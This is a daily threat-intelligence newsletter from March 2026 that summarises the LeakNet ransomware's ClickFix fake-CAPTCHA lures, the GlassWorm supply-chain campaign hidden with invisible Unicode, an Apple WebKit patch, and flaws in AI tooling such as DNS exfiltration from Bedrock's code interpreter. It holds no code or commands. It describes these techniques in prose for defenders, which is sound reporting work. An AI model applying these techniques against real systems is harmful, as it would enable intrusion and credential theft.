Cyware Daily Threat Intelligence, March 20, 2026

The LeakNet ransomware group is bypassing traditional credential theft by weaponizing ClickFix social engineering to trick victims into self-infecting their systems. By presenting fake CAPTCHA prompts on compromised websites, the attackers manipulate users into executing malicious commands that deploy a Deno-based in-memory loader.

The GlassWorm campaign has launched a massive fifth wave, compromising over 400 repositories and extensions across GitHub, npm, and VS Code. Utilizing invisible Unicode characters to hide malicious logic, the threat actor harvests developer credentials and cryptocurrency wallets while using the Solana blockchain.

Apple has debuted its new Background Security Improvements system to deliver an urgent fix for a critical WebKit vulnerability, CVE-2026-20643. This out-of-band patching mechanism allows Apple to bypass the standard OS update cycle and push lightweight fixes directly to core components.

Top Malware Reported in the Last 24 Hours

LeakNet ransomware adopts ClickFix tactics

LeakNet ransomware has introduced a new method of attack by utilizing ClickFix, a social engineering tactic that exploits compromised websites to lure users into executing malicious commands. This approach marks a shift from traditional methods that relied on stolen credentials. The ClickFix technique involves creating fake CAPTCHA verifications that prompt users to enter harmful commands in the Windows Run dialog. Additionally, LeakNet employs a Deno-based command-and-control loader to execute payloads directly in memory, minimizing on-disk evidence and evading detection. The group has expanded its initial access capabilities, moving away from initial access brokers, which allows for faster and broader operations. Their post-compromise activities involve a consistent methodology, including lateral movement, data exfiltration, and encryption, while leveraging legitimate cloud services to obscure their actions.

GlassWorm malware targets hundreds of repositories

GlassWorm malware has resurfaced with a coordinated attack affecting over 400 code repositories and packages on platforms such as GitHub, npm, and VSCode/OpenVSX. Researchers identified 433 compromised components this month, revealing a single threat actor behind the campaign, which utilizes the same Solana blockchain address for command-and-control activities. Initially observed last October, GlassWorm employs “invisible” Unicode characters to conceal malicious code aimed at harvesting cryptocurrency wallet data and developer credentials. The latest wave of attacks has expanded significantly, compromising 200 GitHub Python repositories, 151 JavaScript/TypeScript repositories, and numerous extensions. The malware queries the Solana blockchain every five seconds, leading to the execution of a JavaScript-based information stealer that targets sensitive developer information while avoiding execution on systems with Russian locales.

Top Vulnerabilities Reported in the Last 24 Hours

Apple addresses WebKit vulnerability in updates

Apple has released Background Security Improvements to address a critical WebKit vulnerability (CVE-2026-20643) affecting iOS, iPadOS, and macOS. This vulnerability, which could allow attackers to bypass the same-origin policy through maliciously crafted web content, has been resolved with enhanced input validation in the latest updates. These improvements are part of a new approach by Apple to deliver lightweight security patches for components like Safari and the WebKit framework, enabling more frequent updates without waiting for larger software releases. Users can manage these updates through the Privacy and Security menu in their device settings. This release follows the company's recent efforts to patch multiple zero-day vulnerabilities, showcasing Apple's commitment to enhancing the security of its software ecosystem.

AI vulnerabilities expose data exfiltration risks

Cybersecurity researchers have identified significant vulnerabilities in Amazon Bedrock, LangSmith, and SGLang that expose sensitive data to potential exploitation. Amazon Bedrock's AgentCore Code Interpreter allows outbound DNS queries, which attackers can leverage to establish C2 channels and exfiltrate data through DNS, despite the service being designed for isolated execution environments. LangSmith has a high-severity flaw that enables account takeover through URL parameter injection, allowing attackers to steal user tokens and gain unauthorized access. Additionally, SGLang has critical vulnerabilities related to unsafe pickle deserialization, which could lead to remote code execution.